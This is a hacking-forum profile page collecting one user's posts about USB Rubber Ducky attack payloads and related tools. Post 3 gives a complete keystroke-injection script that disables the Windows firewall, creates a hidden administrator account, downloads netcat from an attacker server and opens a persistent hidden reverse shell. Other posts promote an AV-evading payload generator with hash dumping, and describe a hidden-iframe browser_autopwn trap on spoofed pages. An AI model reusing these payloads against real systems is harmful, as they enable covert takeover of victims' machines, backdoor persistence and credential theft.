Jump to content

skysploit

Active Members
  • Posts

    68
  • Joined

  • Last visited

  • Days Won

    5

Everything posted by skysploit

  1. ~Persistence~ has been added to the Simple-Ducky Payload Generator. See the forum post below for a link to download :) ~skysploit http://forums.hak5.org/index.php?/topic/28969-release-simple-ducky-payload-generator-v14-international-key-mappingkali-linux-compatible/
  2. I have been unsuccessful at getting Windows 7 and OS X payloads to work with VirtualBox. But Windows XP, Vista, Server 2003, and all the Linux Distros i have tried work just fine. VMPlayer works great for Windows 7. I would be interested to see if anyone out there has been successful at getting VirtualBox working with WIndows 7...
  3. Hello, Here's a new payload that I came up with. It targets Windows 7 w/UAC enabled. Here's what happens when you run it... Opens an admin command prompt Creates an admin user (default creds: hacker | mysecretpassword) Disables the windows firewall Enables remote desktop Enables remote assistance Hides the newly created admin account from the Windows Welcome Screen Creates a VBScript to run a hidden instance of Netcat Creates a batch file to launch Netcat (this is needed to mask an open netcat session from the desktop) Downloads netcat from the attackers web server (to transfer netcat to the web directory in kali use: cp /usr/share/windows-binaries/nc.exe /var/www/nc.exe)(launch apache by using: service apache2 start) Calls the VBScript to launch the hidden netcat shell Creates a batch file in the startup directory that will launch the VBScript every time a user logs in (the batch file is hidden/transparent to the user while it runs) So here it is... I will add a fully configurable version of ~Persistence~ to the Simple-Ducky Payload Generator this weekend. ~skysploit DELAY 5000 ESCAPE DELAY 300 CONTROL ESCAPE DELAY 300 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 600 LEFTARROW DELAY 300 ENTER DELAY 800 STRING netsh firewall set opmode disable ENTER DELAY 300 STRING net user hacker mysecretpassword /add && net localgroup administrators hacker /add ENTER DELAY 200 STRING y ENTER DELAY 400 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING copy con nc.vbs ENTER STRING Set WshShell = CreateObject("WScript.Shell") ENTER STRING WshShell.Run chr(34) & "c:\Windows\System32\nc.bat" & Chr(34), 0, false ENTER STRING Set WshShell = Nothing ENTER CTRL z ENTER STRING echo cmdow @ /hid >> nc.bat ENTER STRING echo nc -nv 172.16.1.5 4444 -e cmd.exe >> nc.bat ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile('http://172.16.1.5/nc.exe,c:\Windows\system32\nc.exe'); ENTER STRING cscript nc.vbs ENTER STRING cd c:\Documents And Settings\All Users\Start Menu\Programs\Startup\ ENTER STRING echo cmdow @ /hid >> persistence.bat ENTER STRING echo cscript c:\Windows\System32\nc.vbs >> persistence.bat ENTER STRING exit ENTER
  4. You can download the simple-ducky payload generator. It has two different versions of the download and execute payload built in. One will yield you a User priv shell and the other an Admin priv shell. Here's the link; https://code.google.com/p/simple-ducky-payload-generator/ ~skysploit
  5. Version 1.0.2 now supports international keyboards. Please download it and try it out as I have not been able to test the payloads using international key mappings. Let me know if you have any issues getting it to run.
  6. Hello, In lieu of usbrubberducky.com being down I decided to create the Simple-Ducky Payload Generator. The simple-ducky is designed to quickly create reliable payloads and launch listener's.The Simple-Ducky currently uses version 2.6 of the duck encoder. The lastest version of the Simple-Ducky supports all Debian Linux distro's (i.e. Kali-Linux, Ubuntu, Linux Mint etc). The smart installer will take care of all the work for you. With the simple-ducky in a matter of seconds you can; * Create your evil executable (its automatically placed in your web directory) * Create your inject.bin * Launch a listener (meterpreter or netcat) * Generate custom password list's * Crack extracted passwords * And so much more... Note: This framework was designed to work with Kali Linux out of the box (JDK update is required and included with the simple-ducky). However, it should work with other Linux distro's as long as you install the required dependencies (see the wiki page for other than Kali installs). Installation Installing the simple-ducky just got even easier. Just download the install script, then copy and paste the lines below into your terminal.The install script now supports all Debian based Linux distro's. Install videos are available on the Google code page: https://code.google.com/p/simple-ducky-payload-generator/ There are now two options to install the simple ducky.... Download the install file: https://code.google.com/p/simple-ducky-payload-generator/downloads/detail?name=installer_v1.1.1_debian.sh&can=2&q= root@kali:~# chmod +x installer_v1.1.1_debian.sh root@kali:~# ./installer_v1.1.1_debian.sh root@kali:~# rm installer_v1.1.1_debian.sh To run the program; root@kali:~# simple-ducky Change Log v1.1.1 Changes 1. Added tons of new features; Shells with dbd (incredibly powerful see video below) and the Custom Payload Builder 2. Cleaned up menu options, dependecies, and porcesses 3. Made bug fixes to several payloads 4. Replaced Netcat with Ncat v1.1.0 Changes 1. Upgraded the encoder to version 2.6 2. Made changes to the main menu 3. Added a new payload: LM/NTLM Hash Dump from a Live System 4. Added a new function: LM/NTLM Password Hasher 5. Added a new tool: Site2lst Custom Wordlist Builder 6. Upgraded the installer: Now there is just one version of the Simple-Ducky that supports all Debian distro's (Tested on: Kali-Linux, Ubuntu and Linux Mint v1.0.9 Changes 1. Added a new payload subset titled "Forced Phishing & Web Attacks" 2. Intergrated: SE-Toolkikt, Metasploit's Browser_Autopwn, and BurpSuite. 3. Added Payload: Local DNS Poisoning | SE-Toolkit Java Applet Attack 4. Added Payload: Local DNS Poisoning | Metasploit's Browser_Autopwn 5. Added Payload: Proxy in the Middle (PiTM) | No Admin Access Needed | Burpsuite v1.0.8 Changes 1. Added OSX Single User Mode Reverse Shell Payload 2. Made minor scripting changes 3. Changed Encoder to version 2.5 4. Fixed bugs in the FTP Server Setup option 5. Created a User add function for the FTP Server Setup Option v1.0.7 Changes 1. Fixed command line entrance method on all Windows Vista/7 Payloads w/o UAC (Props to arzen) v1.0.6 Changes 1. Created two separate versions of the simple-ducky (One for Kali-Linux and the other for Other Linux Distros) * The purpose for the Kali-Edition is to follow the Debian compliance that Offensive-Security established in hopes of getting the Simple-Ducky prepacked in Kali-Linux. (Fingers-Crossed) 2. Removed the install dependencies option on the Kali-Linux version (Kali will keep these up to date)(Other-Linux version still has it) 3. Updated the Powershell Download & Execute Payloads to provide better obfuscation (tested on fully patched windows Vista/7/8 running McAfee) 4. Added a new function that configures the Pure-FTPD server for the user v1.0.5 Changes 1. Complete Payload and Menu Revamp v1.0.4 Changes 1. Added ~Persistence~ Payload 2. Updated Menu Options v1.0.3 Changes 1. Payload Update 2. Added 64bit JDK Update Support 3. Added initial delay function (allows you to set a custom delay for driver install time). 4. Changed encoder version from 2.4 to 3.0 v1.0.2 Changes 1. International keyboard mapping added. -- Tester's would be greatly appreciated. 2. Aesthetic changes to text. v1.0.1 Changes 1. Payload Update 2. Encoder downgraded from v3.0 to v2.4 due to issues encoding the Win 7 Reverse Shell payload. Custom Payload Builder and DBD... Watch as we get NT\SYSTEM level privs while evading AV! Thanks for checking out the Simple-Ducky. Please provide any feedback and bug fixes to skyploit@gmail.com ~skysploit
  7. Can you post the syntax that you are using for the encoder? Have you tried running it through http://www.iducke.com/Encoder/IDE?
  8. Foxtrot, thanks for sharing... I'm going to start testing out the script. I'll have some feedback in a few days. ~skysploit
  9. I have nothing to add but great read... I was strapped to my seat the whole time :)
  10. Well who's to say that you can't setup a remote listener and have the iframe pointed to that location. Or possibly have the laptop within wireless range of the pineapple.
  11. Guys, Here's a quick script for changing your mac address. Simply run the script and enter the network card you would like to change. You will see your new mac address as well as your original mac. Enjoy! ~skysploit #!/bin/sh # This script will change your MAC address" # Usage: ./mac-me.sh # Script by skysploit clear echo "What interface would you like to change. Example; eth0" echo "" read ADAPTER; clear echo "Entering stealth mode " echo "" ifconfig $ADAPTER down macchanger -r $ADAPTER ifconfig $ADAPTER up echo "" echo "Your MAC Adrress has been changed, it will reset upon reboot"; echo "If this script failed: <apt-get install macchanger> and run as root"
  12. Though the green CSS theme is pretty slick, it doesn't match my desktop. And everyone knows how picky hackers can be.... Anyhow, here's my CSS script. Now that I have shown you mine, please show me yours. ~skysploit .navbar { top:10px; min-width:80%; background:gray; padding-left: 5px; padding-right: 5px; padding-top: 3px; padding-bottom: 3px; border-top-left-radius: 10px 10px; border-top-right-radius: 10px 10px; border-bottom-left-radius: 10px 10px; border-bottom-right-radius: 10px 10px; text-align:center; color:black; } .content { font-family: monospace; min-width: 700px; max-width: 700px; text-align:center; margin: 0 auto; } .contentTitle { text-align:left; padding-left: 10px; padding-top: 2px; padding-bottom: 2px; border-top-left-radius: 10px 10px; border-top-right-radius: 10px 10px; background:gray; font-weight:bold; font-size:15; color: black; } .contentContent { text-align:left; padding-left: 10px; padding-right: 10px; padding-top: 5px; padding-bottom: 5px; border-bottom-left-radius: 10px 10px; border-bottom-right-radius: 10px 10px; background:black; min-height: 40px; color:white; border-color: gray; border-style: solid; border-width: 1px } .sidePanelLeft { position:absolute; top:50px; text-align:left; min-width:300px; font-family: monospace; } .sidePanelRight { position:absolute; right:1%; top:50px; text-align:left; min-width:300px; font-family: monospace; } .sidePanelTitle { padding-left: 10px; padding-top: 2px; padding-bottom: 2px; border-top-left-radius: 10px 10px; border-top-right-radius: 10px 10px; background:gray; font-weight:bold; font-size:15; color:white; } .sidePanelContent { padding-left: 10px; padding-right: 10px; padding-top: 5px; padding-bottom: 5px; background:black; border-bottom-left-radius: 10px 10px; border-bottom-right-radius: 10px 10px; min-height: 40px; color:white; border-color: gray; border-style: solid; border-width: 1px } .moduleTitle { padding-left: 10px; padding-top: 2px; padding-bottom: 2px; border-top-left-radius: 10px 10px; border-top-right-radius: 10px 10px; background:gray; font-weight:bold; font-size:15; color: white; } .moduleContent { padding-left: 10px; padding-right: 10px; padding-top: 5px; padding-bottom: 5px; border-bottom-left-radius: 10px 10px; border-bottom-right-radius: 10px 10px; background:black; min-height: 40px; color:white; border-color: gray; border-style: solid; border-width: 1px } .modules { position:absolute; right: 20%; left: 20%; font-family: monospace; } .moduleContent td { border-width: 15px; border-spacing: 20px; border-style: solid; border-color: black; border-collapse: collapse; color: white; } body { font-family: monospace; color:white; background:black; text-align:center; } a { color:white; } input[type=text], input[type=password] { font-family:courier; border: 1px; background-color:black; color:white; border-style:dotted; } pre { white-space: pre-wrap; /* css-3 */ white-space: -moz-pre-wrap; /* Mozilla, since 1999 */ white-space: -pre-wrap; /* Opera 4-6 */ white-space: -o-pre-wrap; /* Opera 7 */ word-wrap: break-word; /* Internet Explorer 5.5+ */ }
  13. crepsidro, I have not personally tried to run msf on the pineapple. I dont think it has the "juice" to support it. Here's a little more info on preparing for the autopwn attack. There's multiple ways to this, below is the way I typically setup my connections. Connect the Pineapple to your ethernet port and connect your wireless card to a wireless network. Using Backtrack runnning in a VM, connect both the wireless card and the ethernet port to the VM (yes, i pull both resources from the hosting machine to the VM). Run the pineapple setup script and set your ethernet port to the default address (172.16.42.42), set the wifi adapter to the networks gateway address. Open Metasploit using "msfconsole" or "msfcli" (Again use Google as a reference to help set the parameters above) Hope this helps. ~skysploit
  14. That's a great idea! I will have to go back and play around with the java payload. :)
  15. So, here's a simple change that could pay out big (in a pinch) on a pentest... How does it work? It embeds a tiny iframe (about the size of a ".") at the bottom of a spoofed webpage. Once someone browses to the site they're immediately connected to the attacking machine. Dozens of exploits are then sent back to the victim. If the attack is successful, the attacking machine will receive a meterpreter shell. How to set it up. Add the iframe below to any/all of your spoofed sites. Example, the "facebook.html" file from Darren's "phish-pineapple.zip". Open msfconsole and "use auxiliary/server/browser_autopwn" Set the options below (n00b's, let Google be your guide) Turn on "DNS Spoof" from the main page of the Pineapple. Wait for the victim (subject/client) to browse to the site. Once a connection to the spoofed page has been initiated you will fire a tasty batch of exploits. Quick note with browser_autopwn (for those that have not used it): It is a very finicky auxiliary module within the msf. It will more than likely fail on a patched system (hence the purpose of pentesting). Not to mention the amount of traffic that is generated by browser_autopwn. It's always best to enumerate, find out what browsers are being used, then perform a targeted attack. Side note: Pentesting at Starbucks can get you put in jail... Happy (responsible) hacking! ~skysploit iframe (add this to the end of the script) "iframe SRC="http://172.16.42.42:8080/hacked" height = "0" width ="0"/" Note: replace the " " at the beginning and end with < > Settings for browser_autopwn msf auxiliary(browser_autopwn) > show options Module options (auxiliary/server/browser_autopwn): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 172.16.42.42 yes The IP address to use for reverse-connect payloads SRVHOST 172.16.42.42 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate SSLVersion SSL3 no Specify the version of SSL that should be used URIPATH /hacked no The URI to use for this exploit (default is random) msf auxiliary(browser_autopwn) > exploit ....... (Server build process was pulled out) ....... [*] --- Done, found 53 exploit modules
×
×
  • Create New...